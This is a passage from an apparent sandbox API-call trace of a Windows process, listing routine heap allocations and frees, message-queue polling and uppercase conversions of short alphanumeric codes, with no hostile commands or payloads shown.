(HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0189.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0189.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa700 [0189.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0189.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa2e0 [0189.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa400 [0189.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa610 [0189.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d978 [0189.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0189.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa538 [0189.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa598 [0189.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa730 [0189.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0189.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa280 [0189.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa388 [0189.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0189.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0189.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0189.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0189.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0189.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0189.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0189.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0189.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0189.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0189.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0189.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0189.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0189.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0189.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0189.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0189.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0189.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0189.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0189.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0189.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0189.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0189.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0189.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0189.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0189.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0189.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0189.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0189.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0189.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0189.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0189.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0189.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0189.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0189.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0189.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0189.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d978 | out: hHeap=0x25c0000) returned 1 [0189.160] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0189.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0189.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0189.160] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0189.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0189.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0189.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0189.160] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0189.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0189.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0189.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa310 [0189.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0189.160] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0189.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0189.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0189.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0189.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0189.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0189.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0189.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0189.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0189.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0189.161] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0189.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0189.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0189.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0189.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0189.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0189.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0189.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0189.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0189.161] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0189.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0189.161] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0189.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0189.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0189.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0189.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0189.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0189.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0189.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0189.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0189.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0189.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0189.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0189.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0189.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0189.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0189.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0189.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0189.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0189.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0189.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0189.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0189.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0189.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0189.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0189.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0189.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0189.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0189.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0189.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0189.163] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0189.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0189.163] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0189.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0189.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0189.163] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0189.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0189.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0189.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0189.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0189.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0189.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0189.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0189.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0189.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0189.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0189.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0189.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0189.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0189.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0189.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0189.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0189.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0189.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0189.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0189.164] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0189.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0189.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0189.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0189.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0189.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0189.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0189.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0189.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0189.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0189.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0189.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0189.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0189.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0189.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0189.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0189.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0189.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0189.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0189.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0189.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0189.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0189.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0189.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0189.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0189.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0189.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0189.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0189.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0189.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0189.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0189.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0189.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0189.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0189.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0189.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0189.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0189.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0189.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0189.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0189.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0189.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0189.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0189.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0189.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0189.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0189.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0189.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0189.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0189.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0189.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0189.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0189.167] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0189.167] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0189.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0189.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0189.167] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0189.167] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0189.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0189.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0189.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0189.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0189.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0189.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0189.168] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0189.168] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0189.168] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0189.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0189.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0189.168] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0189.168] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0189.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0189.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0189.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0189.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0189.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0189.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0189.168] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0189.168] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0189.168] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0189.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0189.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0189.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0189.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0189.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0189.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0189.169] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0189.169] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0189.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0189.169] RtlAllocateHeap 